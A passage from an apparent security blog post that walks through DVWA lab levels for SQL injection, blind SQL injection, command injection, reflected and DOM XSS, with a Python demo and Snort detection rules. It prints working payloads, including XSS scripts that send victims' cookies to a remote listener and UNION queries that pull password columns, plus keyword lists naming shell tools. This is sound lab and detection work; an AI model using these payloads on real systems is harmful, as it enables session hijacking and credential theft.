data in memory while an application is processing it. You cannot hash something you still need to read, so the options here are to keep plaintext secrets in memory only for as long as they are needed, and to tokenize or encrypt sensitive fields so that the application handles a token or ciphertext while a separate, tightly controlled component holds the key or the token-to-value mapping. That way, even if an attacker got their hands on the process memory or a dump, what they find is useless without that key or mapping.<\/p>\n<\/div>\n\n\n\n<div class=\"wp-block-group has-zeever-bgsoft-background-color has-background is-layout-constrained wp-block-group-is-layout-constrained\">\n<h3 class=\"wp-block-heading\" id=\"Injections\">3. Injections<\/h3>\n\n\n\n<p>Injection is the category where I created the majority of my Snort rules. I won&#8217;t teach SQL, Bash, PowerShell, or JavaScript in this section.<\/p>\n\n\n\n<p>Usually, when thinking of injections, you think of user input fields, like login forms and URL parameters, whose input is not sanitized. But know that many more vectors exist: HTTP headers, cookies, file names, and anything else the application reads and passes on to an interpreter.<\/p>\n\n\n\n<p>The first type of injection I\u2019m going to cover is SQL injection. 
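Before walking through DVWA's difficulty levels, here is an added Python example of mine (not DVWA's code and not the author's) of the query shape behind the sqli module, `SELECT first_name, last_name FROM users WHERE user_id = '$id'`, first built by string concatenation the way the low level does it and then as a parameterized query the way the impossible level does it. It runs against an in-memory SQLite table with constructed rows and placeholder password strings; because SQLite's comment marker is `-- ` rather than MySQL's `#`, the payloads end with that. The same block also runs the TRUE/FALSE pair that the blind SQL injection section further down relies on.

```python
"""Added example (not DVWA's or the author's code): the DVWA sqli query built
by string concatenation versus with a bound parameter, run against an
in-memory SQLite table of constructed rows."""
import sqlite3


def build_db():
    """Constructed stand-in for DVWA's users table; the password column holds
    placeholder strings, not real hashes."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (user_id INTEGER, user TEXT, first_name TEXT, "
        "last_name TEXT, password TEXT)"
    )
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?, ?)",
        [
            (1, "admin", "admin", "admin", "fakehash-admin"),
            (2, "gordonb", "Gordon", "Brown", "fakehash-gordon"),
            (3, "1337", "Hack", "Me", "fakehash-1337"),
        ],
    )
    return con


def lookup_vulnerable(con, user_id):
    """Low level: the request parameter is pasted into the SQL text, so a quote
    in it ends the string literal and whatever follows is parsed as SQL."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return con.execute(sql).fetchall()


def lookup_parameterized(con, user_id):
    """Impossible level: the value travels to the engine separately from the
    SQL text, so it can only ever be compared, never parsed."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return con.execute(sql, (user_id,)).fetchall()


def lookup_hardened(con, user_id):
    """Parameterized plus the numeric check DVWA's impossible level also does:
    anything that is not an integer is rejected before it reaches the DB."""
    if not str(user_id).isdigit():
        return []
    return lookup_parameterized(con, int(user_id))


# Constructed payloads. UNION pulls the credential columns into the response;
# the AND pair is the boolean-blind probe: same input slot, two different
# answers, and that difference is the information leak.
UNION_PAYLOAD = "1' UNION SELECT user, password FROM users -- "
TRUE_PAYLOAD = "1' AND 1=1 -- "
FALSE_PAYLOAD = "1' AND 1=2 -- "


def demo():
    """Run every payload through each variant and return the rows."""
    con = build_db()
    return {
        "vuln_union": set(lookup_vulnerable(con, UNION_PAYLOAD)),
        "vuln_true": lookup_vulnerable(con, TRUE_PAYLOAD),
        "vuln_false": lookup_vulnerable(con, FALSE_PAYLOAD),
        "param_union": lookup_parameterized(con, UNION_PAYLOAD),
        "param_true": lookup_parameterized(con, TRUE_PAYLOAD),
        "hardened_union": lookup_hardened(con, UNION_PAYLOAD),
        "hardened_ok": lookup_hardened(con, "1"),
    }


if __name__ == "__main__":
    for key, rows in demo().items():
        print(f"{key:15} {rows}")
```

The vulnerable variant hands back every username and password string on the UNION payload and answers the 1=1 and 1=2 probes differently, which is all a blind attack needs. The parameterized variant returns nothing for any of them, because the whole payload is compared against user_id as a single value; the numeric check on top of it refuses the payload before a query is even issued.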
In DVWA, we get a scenario that asks us to input a user ID to retrieve a user\u2019s first name and surname. The goal of this section is to obtain the users&#8217; password hashes.<\/p>\n\n\n\n<p>For the low and high difficulty levels, we can input the ID, then close the quoted string with a single quotation mark and follow it with our own SQL. The only difference between high and low is that in high the ID is entered on a separate pop-up page and carried in the session instead of the URL, which is meant to frustrate automated tools but leaves the query itself just as injectable.<\/p>\n\n\n\n<p>Use the query shown in the image below. It can be used in Low and High.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"379\" height=\"335\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/SQLLow-1.png\" alt=\"\" class=\"wp-image-914\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/SQLLow-1.png 379w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/SQLLow-1-300x265.png 300w\" sizes=\"(max-width: 379px) 100vw, 379px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"766\" height=\"401\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/SQLHigh.png\" alt=\"\" class=\"wp-image-915\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/SQLHigh.png 766w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/SQLHigh-300x157.png 300w\" sizes=\"(max-width: 766px) 100vw, 766px\" \/><\/figure>\n\n\n\n<p>The medium difficulty replaces the input field with a drop-down menu. 
You can simply inspect the web page and replace the value of the selected option in the drop-down with your query. Medium also escapes quotes on the server side (mysqli_real_escape_string), but the ID is used unquoted in the query, so a payload that contains no quotes still works.<\/p>\n\n\n\n<p>The impossible level uses a prepared statement (PDO) with a parameter placeholder and also checks that the ID is numeric. This means the user input is sent to the database separately from the query text, so it is only ever treated as data and can never change the structure of the query.<\/p>\n\n\n\n<p>Below is the Snort rule I created to help detect SQL injections. Keep in mind that a pcre with no U flag searches the raw payload, which is why the quote and operator characters appear percent-encoded in the pattern while the keywords appear plain; an attacker who encodes the keywords as well (for example %55NION) slips past it.<\/p>\n\n\n\n<p id=\"SnortSQL\"><strong>Snort rule to detect SQL Injections<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># The rule below was used, tested, and tailored to Low Difficulty on DVWA\n\n# The rule can be further enhanced by adding quotation variants and additional symbols and SQL commands.\n# If source code\/normal traffic contains some SQL commands, you can take them off to get rid of the false positives, i.e. I took off \"LIKE\" for the High Difficulty.\n# I also had to get rid of \"=\" or \"%3D\", and the SQL commands SELECT and FROM on specific difficulties.\n# You can adjust the URI content as needed. 
I had to remove \"(^|&amp;)?id=&#91;^&amp;]*?\" for the Medium and High difficulty.\n\nalert tcp any any -&gt; any 80 (\\\nmsg:\"SQL Injection detected - \/vulnerabilities\/sqli\";\\\nsid:1000024;\\\nrev:1;\\\nuricontent:\"\/vulnerabilities\/sqli\/?id=\"; nocase;\\\npcre:\"\/(^|&amp;)?id=&#91;^&amp;]*?(%20|%22|%23|%27|%3B|%3C|%3D|%3E|%7C|\\b(?:UNION|AND|OR|SELECT|NULL|CONCAT|FROM|EXEC|IF|SLEEP|CONVERT|HAVING|INSERT|UPDATE|DELETE|DROP|CREATE|CAST|LIKE|IN)\\b|--)\/im\";\\\n)<\/code><\/pre>\n\n\n\n<p>The second injection I want to bring up is a variant of SQL injection known as blind SQL injection. Besides the changes in msg, sid, and URL, the rule is the same.<\/p>\n\n\n\n<p>Blind SQL injection has two common methods. One is the boolean method, which we can see in DVWA: after entering an existing ID, the server tells us the user exists. This is our TRUE.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"343\" height=\"127\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/BSQLBooleanTruth.png\" alt=\"\" class=\"wp-image-922\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/BSQLBooleanTruth.png 343w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/BSQLBooleanTruth-300x111.png 300w\" sizes=\"(max-width: 343px) 100vw, 343px\" \/><\/figure>\n\n\n\n<p>When inputting something that doesn&#8217;t exist, it&#8217;ll tell us that it&#8217;s missing. 
This is our FALSE.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"648\" height=\"336\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/BSQKLBooleanFalse.png\" alt=\"\" class=\"wp-image-923\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/BSQKLBooleanFalse.png 648w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/BSQKLBooleanFalse-300x156.png 300w\" sizes=\"(max-width: 648px) 100vw, 648px\" \/><\/figure>\n\n\n\n<p>The second is the time-based (sleep) method, which you would usually use when the website doesn\u2019t return an error. In the picture above, in the bottom left corner, I use a sleep command. If we told the website to sleep for 5 seconds in our query and the response took that long, the injection was successful. If the response time isn\u2019t long, the injection isn\u2019t successful.<\/p>\n\n\n\n<p>I won\u2019t dive deep into this one, as the mitigations and examples are the same as for normal injection. These two methods are usually automated with sqlmap or a custom script.<\/p>\n\n\n\n<p>Another great resource for learning web security and practicing your scripting is Natas by OverTheWire. Here\u2019s a little script of mine and its output that is related to a blind SQL injection. Here I was abusing the Boolean method to find out which characters were present in the password for the next room, then slowly put a string together, revealing the full password.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"865\" height=\"813\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/BSQLScript.png\" alt=\"\" class=\"wp-image-924\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/BSQLScript.png 865w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/BSQLScript-300x282.png 300w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/BSQLScript-768x722.png 768w\" sizes=\"(max-width: 865px) 100vw, 865px\" \/><\/figure>\n\n\n\n<p>Below is the rule to help detect blind SQL injections. Again, it&#8217;s the same as the normal SQL injection rule.<\/p>\n\n\n\n<p id=\"BlindSQL\"><strong>Snort rule to detect blind SQL Injection<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># Follow the same notes as for the normal SQL Injection rule above.\n# The \/i flag on the pcre already makes it case-insensitive, so nocase is only needed on the uricontent.\n\nalert tcp any any -&gt; any 80 (\\\nmsg: \"SQL Blind Injection detected - \/vulnerabilities\/sqli_blind\";\\\nsid: 1000025;\\\nrev: 1;\\\nuricontent: \"\/vulnerabilities\/sqli_blind\/?id=\"; nocase;\\\npcre:\"\/(^|&amp;)?id=&#91;^&amp;]*?(%20|%22|%23|%27|%3B|%3C|%3D|%3E|%7C|\\b(?:UNION|AND|OR|SELECT|NULL|CONCAT|FROM|EXEC|IF|SLEEP|CONVERT|HAVING|INSERT|UPDATE|DELETE|DROP|CREATE|CAST|LIKE|IN)\\b|--)\/im\";\\\n)<\/code><\/pre>\n\n\n\n<p>Now, moving away from databases, we\u2019re looking at our third section: command injection. Command injection is a form of remote code execution, and the injected commands can vary. The rule contains examples that can be picked up in both Linux and Windows command injection.<\/p>\n\n\n\n<p>Starting with the low-difficulty DVWA, we\u2019re asked to enter an IP address to ping. We can simply add \u201c&amp;&amp;\u201d and the command we want after it. 
A semicolon works as well.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"521\" height=\"306\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/ComLow.png\" alt=\"\" class=\"wp-image-927\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/ComLow.png 521w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/ComLow-300x176.png 300w\" sizes=\"(max-width: 521px) 100vw, 521px\" \/><\/figure>\n\n\n\n<p>As for medium difficulty, the developer has created a small blacklist to block the separators that worked in low difficulty. In this case, we can use the \u201c&amp;\u201d symbol to run the ping command in the background.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"521\" height=\"262\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/ComMed.png\" alt=\"\" class=\"wp-image-928\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/ComMed.png 521w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/ComMed-300x151.png 300w\" sizes=\"(max-width: 521px) 100vw, 521px\" \/><\/figure>\n\n\n\n<p>Then, finally, for the high difficulty, the developer added more items to the blacklist but had a typo for the \u201c|\u201d symbol. 
This allows us to run the command shown below.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"477\" height=\"168\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/ComHigh.png\" alt=\"\" class=\"wp-image-929\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/ComHigh.png 477w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/03\/ComHigh-300x106.png 300w\" sizes=\"(max-width: 477px) 100vw, 477px\" \/><\/figure>\n\n\n\n<p>DVWA\u2019s impossible difficulty has multiple validation checks to ensure that an IP address is being passed in.<\/p>\n\n\n\n<p id=\"SnortCommand\"><strong>Snort rule to detect Command Injections<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># It can be improved by detecting the keywords only when there is no space to their left. Although this is a weakness, the symbols (separators) help in detection, and some fixes will only lead to more false positives.\n# The pcre is not anchored to a parameter, so short keywords like SH, ID, and CD can match anywhere in the request; tune the list to your traffic.\n# Adjust the URL and addresses, and add keywords as you see fit.\n\nalert tcp any any -&gt; any 80 (\\\nmsg: \"Command Injection detected - \/vulnerabilities\/exec\";\\\nsid: 1000023;\\\nrev: 1;\\\nuricontent: \"\/vulnerabilities\/exec\"; nocase;\\\npcre:\"\/(%26|%2A|%3B|%3C|%3E|%3F|%60|%7C|\\b(?:CMD|BASH|SH|POWERSHELL|ECHO|NC|WGET|UNAME|CD|LS|DIR|WHOAMI|IFCONFIG|ID|HOSTNAME|IPCONFIG|CAT|TAIL|HEAD|CHMOD)\\b|--)\/im\";\\\n)<\/code><\/pre>\n\n\n\n<p><strong>Reflected XSS is the fourth injection I will bring up.<\/strong><\/p>\n\n\n\n<p>Reflected XSS is usually initiated after a social engineering attack. For example, if a bank website has this vulnerability, a malicious link can be sent to a victim that triggers a specially crafted request to the website. Let\u2019s say that the crafted request aims to get the victim\u2019s cookie. 
If the attack is successful, the attacker can get into the victim\u2019s account using the cookie.<\/p>\n\n\n\n<p>We can see some examples of this through DVWA. <\/p>\n\n\n\n<p>The Low difficulty for the Reflected XSS section is just an input field asking for your name. The source code does not check or validate user input. The overall objective of this section in DVWA is to get a user\u2019s cookie and hijack their session.<\/p>\n\n\n\n<p>We can set up a remote server to receive the data generated by the script below. The remote server in this case is just a Python HTTP server.<\/p>\n\n\n\n<p>&lt;script&gt;window.location=\u2019http:\/\/172[.]16[.]0[0]102:8080\/?cookie=\u2019 + document.cookie&lt;\/script&gt;<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"414\" height=\"235\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/lowRefScript.png\" alt=\"\" class=\"wp-image-947\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/lowRefScript.png 414w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/lowRefScript-300x170.png 300w\" sizes=\"(max-width: 414px) 100vw, 414px\" \/><\/figure>\n\n\n\n<p>The output from the remote server is shown below. 
In this scenario, the attacker has the victim\u2019s cookie and can use it to hijack their session.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"598\" height=\"82\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/lowRefResp.png\" alt=\"\" class=\"wp-image-948\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/lowRefResp.png 598w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/lowRefResp-300x41.png 300w\" sizes=\"(max-width: 598px) 100vw, 598px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>While performing this injection, Snort was also running and detected the XSS reflection attack.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"732\" height=\"89\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/LowRefSnort-1.png\" alt=\"\" class=\"wp-image-950\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/LowRefSnort-1.png 732w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/LowRefSnort-1-300x36.png 300w\" sizes=\"(max-width: 732px) 100vw, 732px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The medium-difficulty source code is looking for any instance of \u201cscript\u201d, but it can be exploited using the script shown below. The reason why it works is that it\u2019s case-sensitive. We can just capitalize \u201cscript\u201d. 
The Snort rule will also activate, and the remote session will receive the victim&#8217;s cookie.<\/p>\n\n\n\n<p>&lt;SCRIPT&gt;&lt;SCRIPTwindow.location=\u2019http:\/\/172[.]16[.]0[0]102:8080\/?cookie=\u2019 + document.cookie&lt;\/script&gt;<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"386\" height=\"84\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/medrefScript.png\" alt=\"\" class=\"wp-image-951\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/medrefScript.png 386w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/medrefScript-300x65.png 300w\" sizes=\"(max-width: 386px) 100vw, 386px\" \/><\/figure>\n\n\n\n<p>The High difficulty has removed the \u201cscript\u201d pattern. We can exploit HTML Events using the script below. The Snort rule will also detect this, and the remote server will receive the victim&#8217;s cookie.<\/p>\n\n\n\n<p>&lt;img src\/onerror=\u201dvar cook = document.cookie; document.location=\u2019http:\/\/172[.]16[.]0[.]102:8080\/?cookie=\u2019 + cook\u201d&gt;<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"416\" height=\"123\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/highRefScript.png\" alt=\"\" class=\"wp-image-952\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/highRefScript.png 416w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/highRefScript-300x89.png 300w\" sizes=\"(max-width: 416px) 100vw, 416px\" \/><\/figure>\n\n\n\n<p>For the impossible mode, it uses &#8220;htmlspecialchars()&#8221;, which looks for special characters like &#8220;&gt;&#8221; and &#8220;&lt;&#8221; and turns them into &#8220;&amp;lt&#8221; and &#8220;&amp;gt&#8221;. 
This helps prevent input from being interpreted by the browser as malicious code.<\/p>\n\n\n\n<p id=\"SnortReflected\"><strong>Snort rule to detect Reflected XSS<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># The xss_r page takes its input in the name= parameter, so the pcre anchors on name= to match the uricontent above.\n# The \/i flag already makes the pcre case-insensitive, so nocase is only needed on the uricontent.\n\nalert tcp any any -&gt; any 80 (\\\nmsg: \"XSS Reflection Injection detected - \/vulnerabilities\/xss_r\";\\\nsid: 1000030;\\\nrev: 1;\\\nuricontent: \"\/vulnerabilities\/xss_r\/?name=\"; nocase;\\\npcre:\"\/(^|&amp;)?name=&#91;^&amp;]*?(%21|%26|%27|%28|%29|%2A|%2D|%2E|%2F|%3B|%3C|%3D|%3E|%60|%7C|\\b(?:EVAL|UNESCAPE|ATOB|IMG|SRC|ONERROR|ALERT|PARAMETER|VALUE|DOCUMENT.COOKIE|DOCUMENT.LOCATION|DOCUMENT|PROMPT|CONFIRM|ONLOAD|ONMOUSEOVER|SCRIPT)\\b|--)\/im\";\\\n)<\/code><\/pre>\n\n\n\n<p><strong>The fifth injection is DOM XSS.<\/strong><\/p>\n\n\n\n<p>For this injection, the user clicks on a specially crafted malicious link. The request is sent to the web server, but the script only runs on the client side. The script changes the way the page loads in the browser, which is why this XSS is considered client-side.<\/p>\n\n\n\n<p>In this section of DVWA, we are given a drop-down menu to select the user&#8217;s language.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"236\" height=\"121\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/RoomPic.png\" alt=\"\" class=\"wp-image-973\"\/><\/figure>\n\n\n\n<p>Instead of entering our script in an input field, we have to enter it in the URL. Initially, the URL looks like this: it\u2019s just a path.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"295\" height=\"47\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/domPath.png\" alt=\"\" class=\"wp-image-974\"\/><\/figure>\n\n\n\n<p>But after clicking on the &#8220;Select&#8221; button, the URL will be updated. 
Now we can replace &#8220;English&#8221; with our scripts.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"347\" height=\"59\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/domPathUpdated.png\" alt=\"\" class=\"wp-image-975\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/domPathUpdated.png 347w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/domPathUpdated-300x51.png 300w\" sizes=\"(max-width: 347px) 100vw, 347px\" \/><\/figure>\n\n\n\n<p>In the Low difficulty of this section, it will not check\/validate the input. Use the script below to connect to a remote server and collect the victim&#8217;s cookie.<\/p>\n\n\n\n<p>default=&lt;script&gt;window.location=\u2019http:\/\/172[.]16[.]0[.]102:8080\/?cookie=\u2019 + document.cookie&lt;\/script&gt;<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"759\" height=\"150\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/LowDOMURL.png\" alt=\"\" class=\"wp-image-955\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/LowDOMURL.png 759w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/LowDOMURL-300x59.png 300w\" sizes=\"(max-width: 759px) 100vw, 759px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Below is an image showing what the remote server will see from the script used above.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"599\" height=\"184\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/LowDom.png\" alt=\"\" class=\"wp-image-956\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/LowDom.png 599w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/LowDom-300x92.png 300w\" sizes=\"(max-width: 599px) 100vw, 599px\" \/><\/figure>\n\n\n\n<p>We can take that cookie, inspect the page, and replace our current cookie with the victim&#8217;s cookie to 
hijack their session.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"718\" height=\"329\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/lowDOMCookie.png\" alt=\"\" class=\"wp-image-957\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/lowDOMCookie.png 718w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/lowDOMCookie-300x137.png 300w\" sizes=\"(max-width: 718px) 100vw, 718px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Below is the switch from Unknown to the Admin user.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"358\" height=\"262\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/lowDOMAdmin.png\" alt=\"\" class=\"wp-image-958\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/lowDOMAdmin.png 358w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/lowDOMAdmin-300x220.png 300w\" sizes=\"(max-width: 358px) 100vw, 358px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>For the medium difficulty of this section, the source code will remove the usage of &#8220;script&#8221;. 
Just like how we did in the reflective XSS, we can use HTML events.<\/p>\n\n\n\n<p> English&lt;\/select&gt;&lt;img src\/onerror=\u201dvar cook = document.cookie; document.location=\u2019http:\/\/172[.]16[.]0[.]102:8080\/?cookie=\u2019 + cook\u201d&gt;<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"725\" height=\"77\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/MedDOMUrl.png\" alt=\"\" class=\"wp-image-959\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/MedDOMUrl.png 725w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/MedDOMUrl-300x32.png 300w\" sizes=\"(max-width: 725px) 100vw, 725px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Again, this is the output on the remote server after running that script.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"597\" height=\"114\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/MedDOM.png\" alt=\"\" class=\"wp-image-960\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/MedDOM.png 597w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/MedDOM-300x57.png 300w\" sizes=\"(max-width: 597px) 100vw, 597px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>For the high difficulty in this section, the source code whitelisted the options shown in the drop-down menu.<\/p>\n\n\n\n<p>Though we\u2019re able to add in our script after the path, followed by a \u201c#\u201d.<\/p>\n\n\n\n<p>?#default=&lt;script&gt;window.location=\u2019http:\/\/172[.]16[.]0[.]102:8080\/?cookie=\u2019 + document.cookie&lt;\/script&gt;<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"716\" height=\"107\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/highDomurl.png\" alt=\"\" class=\"wp-image-961\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/highDomurl.png 716w, 
https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/highDomurl-300x45.png 300w\" sizes=\"(max-width: 716px) 100vw, 716px\" \/><\/figure>\n\n\n\n<p>This will once again send the victim\u2019s cookie to the remote server.<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img decoding=\"async\" width=\"593\" height=\"86\" src=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/highDom.png\" alt=\"\" class=\"wp-image-962\" srcset=\"https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/highDom.png 593w, https:\/\/victorcoil.tech\/wp-content\/uploads\/2024\/04\/highDom-300x44.png 300w\" sizes=\"(max-width: 593px) 100vw, 593px\" \/><\/figure>\n\n\n\n<p>In impossible mode, the page relies on the browser to perform the proper encoding when making requests.<\/p>\n\n\n\n<p id=\"SnortDOM\"><strong>Snort rule to detect DOM XSS<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># Did not work on High, as anything after the # (the URL fragment) is never sent to the server, so a network IDS cannot see it.\n# The \/i flag already makes the pcre case-insensitive, so nocase is only needed on the uricontent.\n\nalert tcp any any -&gt; any 80 (\\\nmsg: \"XSS DOM Injection detected - \/vulnerabilities\/xss_d\";\\\nsid: 1000031;\\\nrev: 1;\\\nuricontent: \"\/vulnerabilities\/xss_d\/?default=\"; nocase;\\\npcre:\"\/(^|&amp;)?default=&#91;^&amp;]*?(%26|%27|%28|%29|%2A|%2D|%2E|%3B|%3C|%3D|%3E|%60|%7C|\\b(?:EVAL|IMG|SRC|ONERROR|ALERT|VALUE|DOCUMENT.COOKIE|DOCUMENT.LOCATION|DOCUMENT|DOCUMENT.WRITE|DOCUMENT.CREATEELEMENT|ONLOAD|ONMOUSEOVER|SCRIPT|ELEMENT.ADDEVENTLISTENER|GETELEMENTBYID|INNERHTML|SETATTRIBUTE|ELEMENT.INNERHTML|ELEMENT.SETATTRIBUTE|HISTORY|PUSHSTATE|HISTORY.REPLACESTATE)\\b|--)\/im\";\\\n)<\/code><\/pre>\n\n\n\n<p>The sixth injection I\u2019ll bring up is stored XSS.<\/p>\n\n\n\n<p>This XSS is not like the others, which only run once. 
